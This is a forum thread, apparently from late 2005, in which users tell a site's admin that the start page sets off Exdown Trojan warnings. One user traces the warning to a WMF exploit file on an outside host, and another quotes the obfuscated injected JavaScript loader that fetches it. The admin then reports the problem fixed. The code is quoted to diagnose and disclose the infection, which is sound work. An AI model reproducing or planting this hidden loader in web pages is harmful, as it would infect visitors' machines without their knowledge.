please check~~

I got that... on the first page

Sorry about that and please do something, I check everyday!
or
Symantec is too stupid


:D :D :D

i've got the same problem with my avg anti-virus

It's the Exdown Trojan! (avast)

When loading the page a file called xpl.wmf
coming from http://best-voyeur.info will be loaded.
(exact place: http://best-voyeur.info/ntraf/xpl.wmf)

It seems it uses an exploit allowing to execute
code inside a wmv-file.

Update: http://www.f-secure.com/weblog/archives/archive-122005.html#00000752

http://isc.sans.org/diary.php?storyid=972

should we write an email direct to him?
:( :( :( :( :( :( :( :(

Thanks for the information guys.
I have seen your message right now and I was quite surprised cause we didn't get any e-mail from other people regarding this problem.

Actually it looks like that if there was a problem it has been solved now or at least we can't detect any problem on our side of the same kind you have just described
Please let me know if some of you still get the same thing.....


Thanks for the tip

Carlo

Sorry, man,
Still getting the warning about the Trojan.
I sent an e-mail last night. I guess you didn't get it, or I sent it to the wrong mailbox.
Just letting you know.
Regards,
BW

Originally posted by Carlo31
Thanks for the information guys.
I have seen your message right now and I was quite surprised cause we didn't get any e-mail from other people regarding this problem.

Actually it looks like that if there was a problem it has been solved now or at least we can't detect any problem on our side of the same kind you have just described
Please let me know if some of you still get the same thing.....


Thanks for the tip

Carlo

Dear Carlo,

your startpage contains this lines of code

<script language="JavaScript">
e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8 F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86% 8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0 %C0%8F%8A%9C%9D%C2%9B%80%96%8A%9A%9F%C3%86%83%8B%8 0%C0%83%9D%9F%8E%8B%C0%CF%F1%98%86%8D%9D%89%D2%DE% F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82 %8A%D3%D5%C0%8D%86%9B%D3%F1%E2%E7";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>


This loads the Trojan from the best-voyeur.info site

Hauser

ok now i see what you mean.....i got the same problem now

You must to know that not a problem coming from our site but it's a system failure of windows

I think we have solved the problem now (thanks a lot to Hauser for the tip)

Again if the problem come again please let me know

Yes Carlo,
right now i don't have any problem in any of your
pages......everything is running smooth on my side

Thanks

antilop